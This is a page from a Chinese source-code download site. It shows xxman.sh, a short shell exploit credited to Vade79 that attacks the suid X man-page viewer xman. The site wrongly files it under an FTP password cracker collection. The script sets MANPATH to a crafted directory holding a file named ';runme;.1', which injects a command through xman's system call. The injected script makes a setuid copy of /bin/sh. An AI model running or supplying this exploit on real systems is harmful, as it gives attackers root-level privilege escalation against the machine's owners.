xxman.sh

来自「一个FTP密码破解程序的源代码」· Shell 代码 · 共 35 行

35 行

xman doesn't drop privileges anywheres in the program.  but, does support suid installation.  so, exploiting via a system call is much easier than thebuffer overflow in MANPATH, mentioned in another bugtraq posting.  here is an example of such anexploitation possibility:-- xxman.sh --#!/bin/sh# example of xman exploitation. xman# supports privileges.  but, never# drops them.# Vade79 -> v9@realhalo.org -> realhalo.org. MANPATH=~/xmantest/mkdir -p ~/xmantest/man1cd ~/xmantest/man1touch ';runme;.1'cat << EOF >~/xmantest/runme#!/bin/shcp /bin/sh ~/xmanshchown `id -u` ~/xmanshchmod 4755 ~/xmanshEOFchmod 755 ~/xmantest/runmeecho "click the ';runme;' selection," \"exit.  then, check for ~/xmansh."xman -bothshown -notopboxrm -rf ~/xmantest-- xxman.sh --Vade79 -> v9@realhalo.org -> realhalo.org.

xxman.sh - 源码说明

本页面展示了「一个FTP密码破解程序的源代码」中的 xxman.sh 源码文件，采用 Shell 编程语言编写，共 35 行代码。您可以在线阅读完整代码内容，也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫下载站收录了大量与FTP相关的技术资源，包括源代码、技术文档、电路图等，是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C

搜索代码Ctrl + F

全屏模式F11

增大字号Ctrl + =

减小字号Ctrl + -

显示快捷键?